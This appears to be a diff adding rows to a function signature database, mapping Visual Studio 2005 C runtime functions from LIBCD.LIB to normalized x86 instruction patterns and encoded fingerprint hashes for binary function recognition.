+?set_unexpected@@YAP6AXXZP6AXXZ@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",hGY9MAAAAAAAAAAALwJyQtUc1LaEZj0w1RzUtgAAAAAAAAAAlwFqP4RmPTAvAnJC,[],4dbf725e0677f0420f397cade1ab73f9945dd21e,VS2005,LIBCD.LIB
+?__set_inconsistency@@YAP6AXXZP6AXXZ@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",LwJyQtUc1LaEZj0wlwFqP4RmPTAvAnJChGY9MAAAAAAAAAAA1RzUtgAAAAAAAAAA,[],4dbf725e0677f0420f397cade1ab73f9945dd21e,VS2005,LIBCD.LIB
+?set_terminate@@YAP6AXXZP6AXXZ@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",hGY9MAAAAAAAAAAALwJyQtUc1LaEZj0w1RzUtgAAAAAAAAAAlwFqP4RmPTAvAnJC,[],4dbf725e0677f0420f397cade1ab73f9945dd21e,VS2005,LIBCD.LIB
+?_set_se_translator@@YAP6AXIPAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",LwJyQtUc1LaEZj0wlwFqP4RmPTAvAnJChGY9MAAAAAAAAAAA1RzUtgAAAAAAAAAA,[],4dbf725e0677f0420f397cade1ab73f9945dd21e,VS2005,LIBCD.LIB
+_perror,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],CONST\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",FGUr6EV1tmMAAAAAJAPDnVS3WY/pTsVeVLdZjwAAAAAAAAAApBdjbyQDw50qDFsf6U7FXlS3WY8UZSvoRXW2YwAAAAAAAAAAKgxbH1S3WY/pTsVeObf6XiQDw52kF2Nv,[],6df014a6f2d7b9d7f76715492a3366893d92ea1f,VS2005,LIBCD.LIB
+__putenv,"PUSH CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",i1icKNFIlKWvJ1dcUpsff3TA+HDEkqZodMD4cCbu4WXEkqZorydXXE+LzAoAAAAAxJKmaE+LzAoAAAAA0UiUpSbu4WV7m/yXe5v8l7v/IHPEkqZorydXXE+LzAoAAAAAdA6AwItYnCivJ1dcxJKmaE+LzAoAAAAAEIVrf3QOgMCvJ1dcrydXXE+LzAoAAAAAJu7hZU+LzAoAAAAAT4vMCgAAAAAAAAAAxJKmaE+LzAoAAAAAxJKmaE+LzAoAAAAAu/8gc1KbH3/EkqZo,[],b33a077f24cf2743874e873b80093a3a53f39bdd,VS2005,LIBCD.LIB
+__free_osfhnd,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",nIZROP1hg4qchlE4/WGDimIe3zEAAAAAB9l69E+LzAoAAAAAtk8qbtKZkeEGYojDT4vMCgAAAAAAAAAAnIZROAfZevReo4MnJAPDnWIe3zGKdwyY/WGDimIe3zEAAAAAXqODJ2Ie3zEAAAAA0pmR4U+LzAoAAAAAYh7fMU+LzAoAAAAAc0RK7dKZkeEkA8OdBmKIw9KZkeFzRErtincMmP1hg4qchlE4,[],d3a880c80dd2c18709e0f08b501e2d2206f60b56,VS2005,LIBCD.LIB
+__alloc_osfhnd,"PUSH CONST\nPUSH CONST\nPUSH CONST\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nCMP DWORD PTR SS:[EBP+CONST],0",db9tVgLOt44GzXi19sx3pwAAAADtsR5JIZK589Uc1LZ1v21Wac0GANUc1LZ1v21WXqODJ3qXJ7gAAAAAepcnuJyGUThkFbmtepcnuAAAAADtsR5JBs14tfbMd6cAAAAAnIZROF6jgyc1FnITLdcRR5yGUTgAAAAA7bEeSXqXJ7gAAAAANRZyE9Uc1LYAAAAAXqODJ9Uc1LYAAAAAotU0rmnNBgAAAAAANRZyEyGSufMAAAAAZBW5rV6jgyct1xFHXqODJzUWchMAAAAA4mVWG/bMd6cAAAAAAs63jl6jgyfiZVYb1RzUtgAAAAAAAAAA9sx3p5yGUThkFbmt,[],ef9b6f26b4c56875ebd564c0978088af16560cd4,VS2005,LIBCD.LIB
+__open_osfhandle,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV BYTE PTR SS:[EBP+CONST],0\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nTEST R32,R32\nJCC CONST",T4vMCgAAAAAAAAAAnIZROJyGUTg8GUKdPvi55JyGUThHgKQ5Umd/BmTqVrU++LnkgxGsXE+LzAoAAAAARM07h1JnfwZWYMW1PBlCnXhdmpgAAAAAygIoz0+LzAoAAAAAR4CkOU+LzAoAAAAAUmd/BlJnfwZWYMW1eF2amMoCKM+DEaxcig3hA1JnfwZEzTuHnIZROHhdmpiAbVcYgG1XGMoCKM+DEaxcZOpWtZyGUThHgKQ5VmDFtWTqVrU++Lnk,[],c6621283a35f5c153af3d408ed3d6831fa6a2c2c,VS2005,LIBCD.LIB
+__get_osfhandle,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",0pmR4QDh1msAAAAABmKIw9KZkeGtneDg5p0Hm9KZkeEGYojDrZ3g4ADh1msAAAAAAOHWawAAAAAAAAAA,[],9ff32737358eb381044cadb2fadca8097d6f324e,VS2005,LIBCD.LIB
+__set_osfhnd,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH -0C\nCALL DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST",v5RI2E+LzAoAAAAAnIZROL+USNheo4MnT4vMCgAAAAAAAAAAJAPDnXLpUgmKdwyYXqODJ3LpUgkAAAAAzodMiXLpUgkAAAAAc0RK7dKZkeEkA8Od0pmR4U+LzAoAAAAAincMmM6HTImchlE4culSCU+LzAoAAAAAzodMiXLpUgkAAAAAtk8qbtKZkeFzRErtnIZROM6HTImchlE4,[],1643b5c0a7d334726afc7ff9e90ea739587e9b94,VS2005,LIBCD.LIB
+_acos,"FLD1\nFADD ST,ST(1)\nFLD1\nFSUB ST,ST(2)\nFMULP ST(1),ST\nFSQRT\nFXCH ST(1)\nFPATAN",MefoxdFIlKUAAAAA8BCZXpDioRFreRQ/0UiUpYp8rQWKfK0F6FWr2iGHeWM/yxNFN9QtU9FIlKUAAAAAyNV7xCGHeWM/yxNF0UiUpXtGESB7RhEg6FWr2jfULVPNLBGma3kUPzHn6MUx5+jFAFkkeehVq9qc7n8winytBSGHeWMAAAAAzSwRpjfULVOQ4qERe0YRIAAAAAAAAAAAP8sTRYp8rQWKfK0FkOKhEXtGESB7RhEgMefoxdFIlKUAAAAAnO5/MOhVq9rI1XvEIYd5Y5DioRHwEJle,[],2658b9f81a5f4a2e7d1a8948af3e589e8c5eb3a1,VS2005,LIBCD.LIB
+__CIacos,"SUB ESP,CONST\nFST QWORD PTR SS:[ESP]\nCALL CONST\nCALL CONST\nADD ESP,CONST\nRETN",2jyUmAAAAAAAAAAA,dqHX0LygXegBoXWzvKBd6AAAAAAAAAAAAaF1swAAAAAAAAAA,6cdf2d7fc5f86ec692fc42d5b7065c57cd45ccfb,VS2005,LIBCD.LIB
+__makepath,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",T4vMCgAAAAAAAAAAX36qiJhNxWgAAAAAjLRRTop3DJikF2NvpBdjb4p3DJjCOLnBincMmO772nSkF2NvBCG/nop3DJikF2NvpBdjb4p3DJgQiylzXqODJ5hNxWgAAAAAincMmIp3DJikF2NvpBdjb5hNxWhtSQUGbUkFBphNxWhffqqImE3FaF6jgydeo4MnEIspc6QXY28AAAAAbUkFBop3DJggWHeNaAAfC4p3DJhtSQUGXqODJ0+LzAoAAAAAincMmIp3DJikF2Nvwji5wcI4ucFoAB8L7vvadE+LzAoAAAAApBdjb4p3DJgEIb+eIFh3jYp3DJikF2Nv,[],549d9cdca068ed1b77f16c7a252d36b0c844c7e2,VS2005,LIBCD.LIB
+__mbsbtype,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nCMP DWORD PTR DS:[0],0\nJCC CONST",DczAAU+LzAoAAAAAlnPwX+HZBXkAAAAA4dkFeXZTcjbEkqZoQUXQG0+LzAoAAAAAEIVrf5Zz8F8NzMABT4vMCgAAAAAAAAAAxJKmaE+LzAoAAAAAdlNyNuHZBXlBRdAb,[],c0ca05895cf866fc1dadf61c2fc1adf8d550fc47,VS2005,LIBCD.LIB
+__fgetwchar,"PUSH EBP\nMOV EBP,ESP\nPUSH CONST\nCALL CONST\nADD ESP,CONST\nPOP EBP\nRETN",xJNWowAAAAAAAAAA,nVoi5s2seN8AAAAAGoIFSk+LzAoAAAAAincMmDWaiyjFWnUDincMmPIN++r+o4/IxVp1A0+LzAoAAAAA/qOPyE+LzAoAAAAAn7/j+U+LzAoAAAAA8g376vILH3untFwklnPwX82seN8AAAAAT4vMCgAAAAAAAAAAzax436e0XCR+/ZxhNZqLKJZ8m6/NYZihN6Eztop3DJgAAAAA8gsfe5Z8m6/NYZihfv2cYZfgkLE3oTO2p7RcJJfgkLG5beHXzWGYoU+LzAoAAAAAuW3h14p3DJgAAAAAS5ltOKe0XCQp2auwlnybr0+LzAoAAAAAp7RcJJ+/4/kaggVKKdmrsJZz8F+dWiLml+CQsYp3DJgAAAAAl+CQsYp3DJgAAAAA,f81fe5ab0e28007aacf22e959e57965cd047c3f5,VS2005,LIBCD.LIB
+_getwchar,"PUSH EBP\nMOV EBP,ESP\nCALL CONST\nPOP EBP\nRETN",8aGSbwAAAAAAAAAA,xJNWowAAAAAAAAAA,bd4cedeae827845c98575cbef5808863d461a96d,VS2005,LIBCD.LIB
+__wfdopen,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",ac0GAOa2kblvoHUmb6B1Jp+cHzzBm6AunIZROKiUbbOchlE4t5wE4+RSvJ+S9NEBkvTRAeRSvJ91gwavnIZROKiUbbNeo4MnXqODJ5+cHzwAAAAAnIZROORSvJ+S9NEBqJRts9pWOSkAAAAAkvTRAeRSvJ91gwavwZugLgAAAAAAAAAAqJRts9pWOSkAAAAAdYMGrwZiiMPuiKz+5FK8nwZiiMPuiKz+n5wfPEFF0BsAAAAA7ois/mZ5MTUGYojDdYMGr5yGUTjuiKz+5FK8n5yGUTjuiKz+2lY5Kea2kblpzQYABmKIw3hdmphmeTE17ois/uRSvJ+S9NEBkvTRAeRSvJ91gwavn5wfPIT0B/kAAAAAZnkxNcSg0gkAAAAA5raRuUFF0BsAAAAAhPQH+ea2kblpzQYAeF2amJZPmPhmeTE1dYMGr+6IrP4GYojD5FK8n+6IrP4GYojDBmKIw+RSvJ+S9NEBZnkxNcSg0gkAAAAAQUXQG8Sg0gkAAAAAlk+Y+KiUbbOchlE4xKDSCQAAAAAAAAAA,[],697c82793db8bd41703441e3227a68c0d8e423c5,VS2005,LIBCD.LIB
+__fFATN2,"MOV BYTE PTR SS:[EBP+CONST],CONST\nFABS\nFXCH ST(1)\nFABS\nFXCH ST(1)\nFPATAN\nOR R8,R8\nJCC CONST",iPftegGhdbOXqcpKl6nKSgGhdbMAAAAAAaF1swAAAAAAAAAA/CNuHtjNBKaI9+162M0EpgGhdbOXqcpK,[],c731020eec2a99a718635e1f17514328147b543d,VS2005,LIBCD.LIB
+__rtpiby2,FSTP ST\nFLD TBYTE PTR DS:[0]\nRETN,svJ1LwAAAAAAAAAA,[],a3ccf5baedc7d68d6a5b2ffd9f19c78cfcadf7d4,VS2005,LIBCD.LIB
+__fpclass,"MOV R32,DWORD PTR SS:[EBP+CONST]\nNEG R32\nSBB R32,R32\nAND CONST,CONST\nADD R32,CONST\nMOV ESP,EBP\nPOP EBP\nRETN",nIZROJdxUZ5eo4Mn3iSCKfzEoKqchlE4XqODJ5dxUZ4AAAAAsMZjqY2gHmwOlelMlJGnLQAAAAAAAAAAjaAebJSRpy3ltecBG2T1ErDGY6neJIIpl3FRnk+LzAoAAAAA/MSgqk+LzAoAAAAAl3FRnk+LzAoAAAAAnIZROI2gHmy2VhD3T4vMCgAAAAAAAAAAnIZROJdxUZ6chlE4l3FRnk+LzAoAAAAA5bXnAU+LzAoAAAAAtlYQ90+LzAoAAAAADpXpTLZWEPechlE4,[],6d573dc7751ceb29ebc32784a7d07de812d7aa7f,VS2005,LIBCD.LIB
+__logb,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nFLD QWORD PTR DS:[0]\nFCHS\nSUB ESP,CONST\nFSTP QWORD PTR SS:[ESP]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",45wFt0+LzAoAAAAAT4vMCgAAAAAAAAAAnIZROIbL2O+chlE4IvL6AE+LzAoAAAAAg1mPvU+LzAoAAAAAL4R7GU+LzAoAAAAAnIZROC+Eexleo4Mn3iSCKSLy+gCchlE4jaAebINZj73jnAW3XqODJyLy+gAAAAAAhsvY70+LzAoAAAAAZopx2I2gHmzeJIIp,[],254a569ce328354adac7e5f987b829e9c5e723b4,VS2005,LIBCD.LIB
+__nextafter,"MOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nFLD QWORD PTR SS:[EBP+CONST]\nFADD QWORD PTR SS:[EBP+CONST]\nSUB ESP,CONST\nFSTP QWORD PTR SS:[ESP]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",tqj5vx7QlQGSt1tRDpXpTCdayPGchlE4DpXpTHilzTKchlE4k8Em4DTih37BqdBGtqj5v5K3W1GNoB5skrdbUR7QlQFOT4TlDpXpTHilzTKchlE4jaAebI2gHmy2qPm/nIZRODTih354pc0ytqj5v42gHmyGy9jveKXNMk+LzAoAAAAATk+E5YsNFEwOlelMtqj5v42gHmySt1tRc4GwS0+LzAoAAAAAHtCVAYsNFEwOlelMhsvY70+LzAoAAAAAiw0UTIsNFEychlE4krdbUV6jgycAAAAAnIZROMrkUp6LDRRMiw0UTHOBsEuchlE4T4vMCgAAAAAAAAAAjaAebI2gHmyhNkZQnIZROHOBsEvK5FKenIZROIsNFEwnWsjxyuRSnk+LzAoAAAAAJ1rI8U+LzAoAAAAANOKHfl4Uku2UX8uyNOKHfjTih34OlelMjaAebI2gHmy2qPm/oTZGUM6dkAb0Ke4IwanQRrao+b804od+tqj5v5K3W1GNoB5sNOKHfjTih34OlelMlF/Lsrao+b9eFJLt9CnuCI2gHmwAAAAAjaAebB7QlQG2qPm/zp2QBo2gHmy2qPm/nIZROHilzTI04od+XqODJx7QlQEAAAAAjaAebI2gHmy2qPm/XhSS7U+LzAoAAAAA,[],97f72bc189e1fd7497fbfe44205fc7ce0f4112f7,VS2005,LIBCD.LIB
+__finite,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",AOHWawAAAAAAAAAADczAAQDh1msAAAAAB7EmSSqzQt4NzMABKrNC3gDh1msAAAAA,[],45040561d9431825a06605e13b020e7b795677b2,VS2005,LIBCD.LIB
+__chgsign,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",4O1vVQAAAAAAAAAA,[],170d5d170a40babf56c78ad5e635772ad0386d03,VS2005,LIBCD.LIB
+__copysign,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]",2oDM+AAAAAAAAAAA,[],2b994831c691b92d6f45461960b89140e6b3ffa4,VS2005,LIBCD.LIB
+__scalb,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",kYzi/wAAAAAAAAAA,nIZROIbL2O+chlE4AEuWuU+LzAoAAAAAnIZROLSpEOteo4MnjaAebI+/AZGGy9jvXqODJ5LFvDAAAAAAhsvY70+LzAoAAAAAhsvY70+LzAoAAAAAtKkQ60+LzAoAAAAAiw0UTIsNFEySxbwwksW8ME+LzAoAAAAAj78BkSvlYLhiIQpEZopx2I2gHmzeJIIp98LdJk+LzAoAAAAAiw0UTIsNFEySwpRlksW8ME+LzAoAAAAAksKUZU+LzAoAAAAAK+VguOr87jZxWpQ6iw0UTOr87jZxWpQ6YiEKRIsNFEwAAAAA3iSCKZLFvDCchlE4cVqUOosNFEwAAAAAiw0UTPfC3Sb5d2VRT4vMCgAAAAAAAAAA6vzuNosNFEwAS5a5+XdlUU+LzAoAAAAAiw0UTIsNFEwAS5a5,4471481ff5f0caf2e5ed070253e3bfbfd1fcf3f1,VS2005,LIBCD.LIB
+__isnan,"PUSH EBP\nMOV EBP,ESP\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nAND R32,CONST\nCMP R32,CONST\nJCC CONST",AOHWawAAAAAAAAAADpXpTJdxUZ6chlE4l3FRngDh1msAAAAAB7EmSTTih34OlelMnIZROJdxUZ404od+Ju7hZQDh1msAAAAANOKHfibu4WWXcVGe,[],99a80926dc26b9d6f6270966b7d260a352953443,VS2005,LIBCD.LIB
+_clock,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]",lOnfKgAAAAAAAAAA,[],4f65d37f30d7f8d5716743dfd003ece2299fe6d2,VS2005,LIBCD.LIB
+___inittime,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL DWORD PTR DS:[0]",UekDlgAAAAAAAAAA,[],f8773009f67a5886fc3154a8787cf1c32f8ed084,VS2005,LIBCD.LIB
+__chdir,"CALL DWORD PTR DS:[0]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nOR R32,CONST\nMOV ESP,EBP\nPOP EBP\nRETN",3/W7jPaiguLsz7AiT4vMCgAAAAAAAAAA7M+wIojKIOLpMl7IiMog4vaiguINzMABtjCcBPaiguLf9buMDczAAU+LzAoAAAAA6TJeyIjKIOINzMAB9qKC4gAAAAAAAAAA7M+wIukyXsjsz7AiDczAAU+LzAoAAAAA,[],0c7f83bee4394a74932be5013e4768842e71d31f,VS2005,LIBCD.LIB
+_towlower,"PUSH CONST\nMOV R16,WORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nTEST R32,R32\nJCC CONST",T4vMCgAAAAAAAAAAJbn54R2cRa6WfJuvlnybr0+LzAoAAAAAmzkZb5Z8m68IEEGmeFVteSW5+eEZ8xfWlnybr0+LzAoAAAAAJAPDnXhVbXmbORlvwg3kzCQDw539yWqbCBBBppZ8m68AAAAA/clqm0+LzAoAAAAAmzkZb5Z8m6+bORlvlnybr0+LzAoAAAAAGfMX1iW5+eGWfJuvHZxFrk+LzAoAAAAA,[],71fd77f16088ac2c3ad0e1086438f3b9859508f1,VS2005,LIBCD.LIB
+_fprintf,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR SS:[EBP+CONST],R32",dYMGr5yGUTj+qN725FK8n5yGUTj+qN72kvTRAeRSvJ91gwavmY/2juRSvJ+S9NEB/qje9gAAAAAAAAAAnIZROORSvJ+S9NEBdYMGr5yGUTichlE45FK8n5yGUTichlE4kvTRAeRSvJ91gwavnIZROORSvJ+S9NEB,[],80bc7edcd88551139f6e209c5d64fc8286f1cbb4,VS2005,LIBCD.LIB
+__chsize,"MOV R32,DWORD PTR SS:[EBP+CONST]\nSAR R32,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nMOV R32,DWORD PTR DS:[R32*4]\nMOVSX R32,BYTE PTR DS:[R32+R32*8+CONST]\nAND R32,CONST\nTEST R32,R32",DUrhda8nV1wNSuF1JAPDnbVmDh1D2ulMKpGs1t906nxVtVaSQ9rpTEA8EisAAAAAVbVWkrZoqRAAAAAAtWYOHUA8EisAAAAADUrhddfg0WGvJ1dcBmKIw5yGUTgeGLo533TqfLZoqRAAAAAAkaVfSiqRrNZAPBIrtmipEN906nxVtVaSSUMzNMSg0gkAAAAA1s8lnklDMzQAAAAArydXXMSg0gkAAAAAHhi6OcSg0gkAAAAA1+DRYYsNFEwPswjDVbVWkhp0TpQAAAAAQDwSK0lDMzQAAAAAxKDSCQAAAAAAAAAAnIZROORSvJ/b6hIU33TqfBp0TpQAAAAA2+oSFORSvJ87j6vliw0UTElDMzTtOWIxGnROlJGlX0okA8OdD7MIwyqRrNYAAAAA7TliMUlDMzTWzyWeNAEkUR4YujkGYojDO4+r5eRSvJ8AAAAA5FK8n5yGUTgNSuF1,[],8fc14dc3f2585363b68795f23bf349c4f7a56d2e,VS2005,LIBCD.LIB
+_strtok,"MOV R32,DWORD PTR SS:[EBP+CONST]\nADD R32,CONST\nMOV DWORD PTR SS:[EBP+CONST],R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nXOR R32,R32\nMOV R8,BYTE PTR DS:[R32]\nTEST R32,R32\nJCC CONST",4dkFefFxVSJh65uKcVqUOvwkpHIAAAAAQUXQG0+LzAoAAAAAyFJf1/wkpHIAAAAAXqODJ7FGFJ0AAAAAnIZROF9XKvX6h3zu8XFVIkFF0BsNzMABMCgAEJyGUTgAAAAABZnzrHFalDrh2QV5Yeubil6jgycNOYnXsUYUnfFxVSJh65uKcVqUOuHZBXkAAAAA/CSkcnFalDrh2QV5DTmJ1/FxVSIAAAAAX1cq9V9XKvWchlE4DczAAU+LzAoAAAAA4dkFeXFalDrIUl/XPsqG2ZyGUTgAAAAAnIZROAWZ86xxWpQ6+od87j7KhtkAAAAAT4vMCgAAAAAAAAAA,[],7714cff06bf9d11f5f25c62b833b27fad66863a4,VS2005,LIBCD.LIB
+?terminate@@YAXXZ,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nMOV ESP,EBP\nPOP EBP\nRETN",kd/H/IDmHLwAAAAA5AKQ7ZHfx/wAAAAAaRiBOJHfx/zkApDtgOYcvAAAAAAAAAAA,[],df9c5e2f08b3658221bee6fb97a25ad5521829e8,VS2005,LIBCD.LIB
+?unexpected@@YAXXZ,"PUSH EBP\nMOV EBP,ESP\nCMP DWORD PTR DS:[0],0\nJCC CONST",OWijNKSC+aLyJRFEpIL5ogAAAAAAAAAA8iURRAAAAAAAAAAA,[],29e25fb7da286458ddcf5e505b7497f989f569a6,VS2005,LIBCD.LIB
+?_inconsistency@@YAXXZ,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV DWORD PTR FS:[0],R32\nPOP R32\nPOP R32\nPOP R32\nMOV ESP,EBP\nPOP EBP\nRETN",kd/H/IDmHLwAAAAA5AKQ7ZHfx/wAAAAAgOYcvAAAAAAAAAAAaRiBOJHfx/zkApDt,[],df9c5e2f08b3658221bee6fb97a25ad5521829e8,VS2005,LIBCD.LIB
+__inpd,"MOV R16,WORD PTR SS:[ESP+CONST]\nIN R32,R16\nRETN",E2SoagAAAAAAAAAA,[],47f7cc7254d4215d11e3dc125662ada756803794,VS2005,LIBCD.LIB
+__inpw,"MOV R16,WORD PTR SS:[ESP+CONST]\nIN R16,R16\nRETN",nbMG+gAAAAAAAAAA,[],b896ead7372f6106cc15bbfcdd3680d979cb551d,VS2005,LIBCD.LIB
+__inp,"XOR R32,R32\nMOV R16,WORD PTR SS:[ESP+CONST]\nIN R8,R16\nRETN",SXVyzAAAAAAAAAAA,[],510cd67bcc01c346c4e2c0a06065617c332175a8,VS2005,LIBCD.LIB
+__cenvarg,"MOV R32,DWORD PTR SS:[EBP+CONST]\nMOV R32,DWORD PTR DS:[0]\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nPUSH R32\nCALL CONST\nADD ESP,CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR DS:[R32+R32+CONST]",XqODJyq54VQAAAAANK2rlpyGUTg2iIT8BZ0odKvznlEAAAAAyFJf14OuQ14AAAAAkcQTtaoBKDrASjW5g65DXjqNu5deo4MnaSYvycDxU+yDUkRbXqODJyq54VQAAAAAOo27lyQDw50aTu/g0sghU5HEE7UFnSh0XqODJ337GgIAAAAAwPFT7JyGUTgwM5KTWv/+XpHEE7Ublkc6q/OeUVr//l5eo4Mnq/OeUZHEE7Ublkc6Gk7v4KoBKDoAAAAAnIZROJZFyadKiADLNoiE/E+LzAoAAAAASogAy9m7eoLWKmuQJAPDnfQp7ggwhQvmG5ZHOpHEE7XMrHgdMDOSk5yGUTg5As+H1iprkE+LzAoAAAAAwEo1uU+LzAoAAAAAMCgAEIOuQ14AAAAAzKx4HZHEE7XSyCFT2bt6gk+LzAoAAAAAg65DXsDxU+yDUkRbrydXXE+LzAoAAAAAlkXJp0+LzAoAAAAAnIZRODqNu5dUwZr8KrnhVIOuQ14AAAAAg1JEW4OuQ14AAAAA9CnuCHzJoXYAAAAAVMGa/IOuQ14AAAAAffsaAlr//l6r855RKrnhVIOuQ14AAAAAg65DXpyGUTg5As+HT4vMCgAAAAAAAAAAOQLPh4OuQ14AAAAAqgEoOmkmL8nIUl/XMIUL5vQp7givJ1dcg65DXjStq5Zeo4MnfMmhdlr//l6r855R,[],a0efbcfdb144faa2be9acb6431c9747cd23cba12,VS2005,LIBCD.LIB
+__wsetargv,"PUSH CONST\nCALL CONST\nADD ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nMOV R32,DWORD PTR SS:[EBP+CONST]",cxIAnhqEK/cUZSvoXMvmW9XP2IVelJjuXpSY7gAAAAAAAAAAFGUr6FzL5lsAAAAA1c/YhQAAAAAAAAAAGoQr99XP2IVelJju,[],3b832ad267cba75ec8c158d39a77632d049eea06,VS2005,LIBCD.LIB
+_freopen,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH R32\nPUSH R32\nPUSH R32\nCMP DWORD PTR SS:[EBP+CONST],0\nJCC CONST",O4+r5eRSvJ8AAAAA5FK8n5yGUTichlE45FK8n5yGUTjruScgnIZROORSvJ+S9NEBnIZROORSvJ+S9NEBdYMGr5yGUTikF2Nv5FK8n5yGUTikF2NvO4+r5eRSvJ8AAAAAkvTRAeRSvJ91gwavkvTRAeRSvJ87j6vlkvTRAeRSvJ87j6vlpBdjb+RSvJ+S9NEBn7/j+bxmJxQAAAAA67knILxmJxSfv+P5vGYnFAAAAAAAAAAAO4+r5eRSvJ8AAAAA5FK8n6QXY2+chlE4kvTRAeRSvJ87j6vlt5wE4+RSvJ+S9NEBnIZROORSvJ+S9NEB,[],d9dc611739c61eff0de408e7860bf3af97215831,VS2005,LIBCD.LIB
+__wdospawn,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV DWORD PTR SS:[EBP+CONST],0\nMOV BYTE PTR SS:[EBP+CONST],0\nMOV R8,BYTE PTR SS:[EBP+CONST]\nMOV BYTE PTR SS:[EBP+CONST],R8\nMOV R8,BYTE PTR SS:[EBP+CONST]",D9LJReikXWg70T3zT4vMCgAAAAAAAAAAO9E98wAAAAAAAAAA6KRdaE+LzAoAAAAA,[],4571b850404be5ba8c04ca158d929c35e85f30cd,VS2005,LIBCD.LIB
+_strspn,"MOV R32,R32\nADD ESP,CONST\nPOP R32\nLEAVE\nRETN",EaatMY/izv0AAAAA/QMNERaROXoAAAAAFpE5erL1HPmqtBmvqrQZrxaROXqy9Rz5j+LO/f0DDRHVkOPrsvUc+QAAAAAAAAAA1ZDj64/izv0AAAAA,[],ef6b67a92551b6257616ffa486090dfc549c27a6,VS2005,LIBCD.LIB
